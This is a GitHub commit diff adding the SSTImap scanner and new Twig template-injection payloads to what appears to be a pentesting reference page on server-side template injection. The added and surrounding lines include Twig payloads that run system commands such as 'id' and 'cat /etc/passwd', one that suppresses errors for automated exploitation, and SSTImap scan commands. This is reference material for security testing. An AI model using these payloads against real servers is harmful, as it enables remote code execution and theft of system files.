Merge pull request #778 from vladko312/patch-1

Added SSTImap tool and Twig payloads
This commit is contained in:
Carlos Polop 2024-01-10 23:11:04 +01:00 committed by GitHub
commit defc06c1da
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

View file

@ -125,6 +125,14 @@ tinja url -u "http://example.com/?name=Kirlia" -H "Authentication: Bearer ey..."
tinja url -u "http://example.com/" -d "username=Kirlia" -c "PHPSESSID=ABC123..." tinja url -u "http://example.com/" -d "username=Kirlia" -c "PHPSESSID=ABC123..."
``` ```
### [SSTImap](https://github.com/vladko312/sstimap)
```bash
python3 sstimap.py -i -l 5
python3 sstimap.py -u "http://example.com/ --crawl 5 --forms
python3 sstimap.py -u 'https://example.com/page?name=John' -s
```
### [Tplmap](https://github.com/epinna/tplmap) ### [Tplmap](https://github.com/epinna/tplmap)
```python ```python
@ -539,6 +547,10 @@ this.evaluate(new String(new byte[]{64, 103, 114, 111, 111, 118, 121, 46, 116, 1
{{['id']|filter('system')}} {{['id']|filter('system')}}
{{['cat\x20/etc/passwd']|filter('system')}} {{['cat\x20/etc/passwd']|filter('system')}}
{{['cat$IFS/etc/passwd']|filter('system')}} {{['cat$IFS/etc/passwd']|filter('system')}}
{{['id',""]|sort('system')}}
#Hide warnings and errors for automatic exploitation
{{["error_reporting", "0"]|sort("ini_set")}}
``` ```
**Twig - Template format** **Twig - Template format**
@ -1040,6 +1052,8 @@ If you think it could be useful, read:
{% embed url="https://github.com/Hackmanit/TInjA" %} {% embed url="https://github.com/Hackmanit/TInjA" %}
{% embed url="https://github.com/vladko312/sstimap" %}
{% embed url="https://github.com/epinna/tplmap" %} {% embed url="https://github.com/epinna/tplmap" %}
{% embed url="https://github.com/Hackmanit/template-injection-table" %} {% embed url="https://github.com/Hackmanit/template-injection-table" %}